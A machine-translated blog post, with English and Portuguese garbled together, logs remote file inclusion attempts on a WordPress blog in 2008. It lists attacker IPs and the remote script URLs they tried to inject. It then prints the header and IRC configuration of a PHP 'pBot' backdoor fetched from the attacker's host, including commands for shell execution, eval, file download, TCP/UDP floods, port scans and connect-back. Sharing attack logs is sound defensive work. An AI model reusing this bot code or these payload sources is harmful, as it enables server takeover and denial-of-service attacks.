Kakkoi Kakkoi

"desenvolvimento web, software, windows dicas e truques"

Diário Hacking Attemps em blog.kakkoi.net - 6 de Fevereiro de 2008

Feb Fevereiro
06 06

Diário Hacking Attemps em blog.kakkoi.net - 6 de Fevereiro de 2008

Postado por Noé arca 7 meses atrás.

Arquivado em Segurança ¸ script injecção e vulnerabilidade.

Hacking tentativas Hoje, a atualização a partir de nós apenas WordPress 2.3.2 a 2.3.3 libertação de segurança. Há 21 ataque (script injectáveis) a partir de 3 blog.kakkoi.net conhecido bot-Herder scripts ↓. O primeiro é do atacante 212.24.62.200 → udkado.ru encobrir as suas useragent Googlebot (um verdadeiro homem?). Foram brincar com a minha página de redirecionamento 302.curie blog.kakkoi.net / uri /. Eu o atacante enviar dados ao abuso das redes e da IronPort.

As próximas horas, recebemos 20 ataque a partir da mesma bot-Herder. Eles provavelmente tem uma larga escala de DDNS (china → → korea nós). Notavelmente os scans padrão é previsível. Do nosso ponto de 5 de Fevereiro atacar todos estes botnet pesquisa tem como alvo alguns palavras-chave de segurança, uma injeção para que setup pote de mel direito a esse URL em particular.

Hacking Attempts on Kakkoi Hacking tentativas em Kakkoi

Sort by Injection type. Classificar por tipo de injecção.

IP / DDNS IP / DDNS	UA UA	ATT ATT	Country País	Params
212.24.62.200 212.24.62.200	Googlebot Googlebot	1	Russia Rússia	www.yahoo.com www.yahoo.com Request URI: www.yahoo.com Solicitação URI: www.yahoo.com
61.152.158.46 61.152.158.46	N/A N / A	4	China Louça	http://basiclifesaving.org/mycomments/rom.txt http://www.freewebtown.com/acc827/test.txt Request URI: /security/injection/ Solicitação URI: / security / injecção /
85.88.3.47 85.88.3.47 74.205.123.49 74.205.123.49 210.205.6.161 210.205.6.161 207.44.246.45 207.44.246.45	N/A N / A	16	Germany Alemanha US E.U. Korea Coréia US E.U.	http://basiclifesaving.org/mycomments/rom.txt http://www.freewebtown.com/acc827/test.txt Request URI: /security/injection/ Solicitação URI: / security / injecção /

The Bot-herder Host O Bot-Herder Host

Parte da classe pBot fonte tomada de http://basiclifesaving.org/mycomments/rom.txt

 <? /*  *  * #crew@corp. / * * * # @ Tripulação corp. since 2003  * edited by: devil__ <admin@xdevil.org>  *  * COMMANDS:  *  * .user <password> //login to the bot  * .logout //logout of the bot  * .die //kill the bot  * .restart //restart the bot  * .mail <to> <from> <subject> <msg> //send an email  * .dns <IP|HOST> //dns lookup  * .download <URL> <filename> //download a file  * .exec <cmd> // uses exec() //execute a command  * .sexec <cmd> // uses shell_exec() //execute a command  * .cmd <cmd> // uses popen() //execute a command  * .info //get system information  * .php <php code> // uses eval() //execute php code  * .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack  * .udpflood <target> <packets> <packetsize> <delay> //udpflood attack  * .raw <cmd> //raw IRC command  * .rndnick //change nickname  * .pscan <host> <port> //port scan  * .safe // test safe_mode (dvl)  * .inbox <to> // test inbox (dvl)  * .conback <ip> <port> // conect back (dvl)  * .uname // return shell's uname using a php function (dvl)  *  */  set_time_limit(0); error_reporting(0); echo "Ok unlocker. We did i!";  class pBot {  var $config = array("server"=>"Bucharest.ro.eu.ultra-chat.org",  "port"=>"6667",  "pass"=>"n",  "prefix"=>"[R]",  "maxrand"=>"4",  "chan"=>"#unlocker",  "chan2"=>"#unlocker",  "key"=>"n",  "modes"=>" p",  "password"=>"n",  "trigger"=>".",  "hostauth"=>"Robert.users.ultra-chat.org" // * for any hostname (remember: /setvhost xdevil.org)  ); * Desde 2003, editado por: devil__ <admin@xdevil.org> * * comandos: * *. <password> usuário / / login com o bot *. logout / / logout do robô *. morrem / / matar o bot *. reiniciar / / reiniciar o bot *. <to> mail <from> <subject> <msg> / / * enviar um e-mail. dns <IP|HOST> / / * dns lookup. <url> <filename> download / / descarregar * um arquivo. <cmd> exec / / usa exec () / / * executar um comando. sexec <cmd> / / usa shell_exec () / / * executar um comando. cmd <cmd> / / usa popen () / / * executar um comando. info / / get sistema de informação *. <php code> php / / usa eval () / / * execute código PHP. tcpflood <target> <packets> <packetsize> <port> <delay> / / tcpflood * ataque. udpflood <target> <packets> <packetsize> <delay> / / * udpflood ataque. cru <cmd> / / IRC cru comando *. rndnick / / * alterar apelido. pscan <host> <port> / / porto * varredura. segura / / teste safe_mode (dvl) *. Cx.entrada <to> / / teste Cx.entrada (dvl) *. conback <ip> <port> / / conect back (dvl) *. uname / / retorno do shell uname usando um php function (dvl) * * / set_time_limit (0); error_reporting (0); echo "Ok unlocker. Fizemo-i!"; classe pBot (var $ config = array ( "server" => "Bucharest.ro.eu. ultra-chat.org "," porto "=>" 6667 "," pass "=>" n "," prefixo "=>"[ R] "," maxrand "=>" 4 "," chan "=> "# unlocker", "chan2 "=>"# unlocker", "chave" => "n", "modos "=>"  p", "password" => "n", "acionar "=>". "," Hostauth "=>" Robert.users.ultra-chat.org "/ / * para qualquer host (lembre-se: / setvhost xdevil.org));

External Links Ligações externas

Sobre o Autor

Palavras-chave:

Rated 3 Nominal de 3

February 6, 2008 at 10:59 pm 6 de fevereiro de 2008, 10:59 pm
February 7, 2008 at 6:44 pm 7 de fevereiro de 2008 em 6:44 pm
0.3 0,3
url URL

- Não Responses para "Daily Hacking Attemps em blog.kakkoi.net - 6 de Fevereiro de 2008"
  Trackback URL: Trackback URL: Use o ping TrackBack url ↑ a este artigo. Se o seu blog não suporta trackbacks você pode querer deixar um recado vez.
- Comment Policy Comentário Política
  RE: Diariamente Hacking Attemps em blog.kakkoi.net - 6 de Fevereiro de 2008 - "A Guide" ↓
  Diário Hacking Attemps em blog.kakkoi.net - 6 de Fevereiro de 2008 Kakkoi 7 meses atrás 5 url
  A seguinte "Código" são concebidos para proteger você e outros usuários do site.
  Ser relevante: Seu comentário devem ser pensadas uma contribuição para o tema da inscrição. Mantenha os seus comentários construtivos e educado.
  Não publicidade ou spam: Não use o recurso de comentário de entidades comerciais para a promoção / produtos, serviços ou Web sites afiliados. Você está autorizado a publicar um link enquanto ele é relevante para a entrada.
  Manter dentro da lei: Não link para sites conteúdo ofensivo ou ilegal. Não faz qualquer comentário difamatório ou depreciativas que poderia prejudicar a reputação de uma pessoa ou organização.
  Privacidade: Não publique informações pessoais relativas a si mesmo ou qualquer outra pessoa - (isto é: endereço, local de trabalho, telefone ou número de telemóvel ou endereço de e-mail).
  A fim de manter estas experiências agradável e interessante para todos os nossos usuários, nós pedimos que você siga as diretrizes acima.
  be the first to comment. ser o primeiro a comentar.
  Sinta-se livre para contratar, fazer perguntas, e diga-nos o que você está pensando! Regular e mais perspicazes comentários são bem-vindas.
"escrever como se estivesse conversando com uma boa amiga (na frente de sua mãe)."
.have your say . a sua opinião

Name (required) Nome (obrigatório)
Email (required, will not be published) Email (obrigatório, não será publicado)
Website Website
Aviso: Para qualquer conteúdo que você postar, você decide conceder a Kakkoi a título gratuito, irrevogável, perpétuo, exclusiva e totalmente sublicenciável para usar, reproduzir, modificar, adaptar, publicar, traduzir, criar trabalhos derivativos, distribuir, executar e exibir tal conteúdo, no todo ou em parte, em todo o mundo e para integrá-la em outras obras, sob qualquer forma, mídia ou tecnologia atualmente conhecida ou posteriormente desenvolvida. Alguns direitos reservados.

Kakkoi Kakkoi

Diário Hacking Attemps em blog.kakkoi.net - 6 de Fevereiro de 2008